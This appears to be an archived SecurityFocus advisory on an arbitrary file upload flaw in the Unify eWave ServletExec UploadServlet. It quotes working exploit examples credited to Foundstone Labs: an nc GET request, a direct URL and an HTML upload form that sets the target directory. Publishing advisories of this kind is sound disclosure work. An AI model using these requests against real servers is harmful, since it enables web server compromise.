Unify eWave ServletExec File Upload Vulnerability

Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.

ServletExec contains an unregistered servlet called 'UploadServlet'. By requesting a specially formed HTTP or 'GET' request, it is possible for a remote user to upload any file to any directory on the server where ServletExec resides. This vulnerability can also be exploited if a user creates an HTML form on their local system and from that point use the servlet in question to upload any arbitrary file.

Successful exploitation of this vulnerability could lead to a compromise of the web server.

The following examples are provided by Foundstone Labs <labs@foundstone.com>:

HTTP and 'GET' request:

nc target
GET /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0
or
http://target/servlet/com.unify.ewave.servletexec.UploadServlet

HTML form:

<FORM METHOD=POST ENCTYPE='multipart/form-data'

ACTION='http://target/servlet/com.unify.ewave.servletexec.UploadServlet'>
<P>
Upload Directory:
<INPUT TYPE=TEXT SIZE=35 Name=uploadDir>
<P>
File to Upload:
<INPUT TYPE=FILE SIZE=35 NAME=File1>
<P>
<INPUT TYPE=SUBMIT NAME="Upload Files" VALUE="Upload Files">
</FORM>


 

Privacy Statement
Copyright 2010, SecurityFocus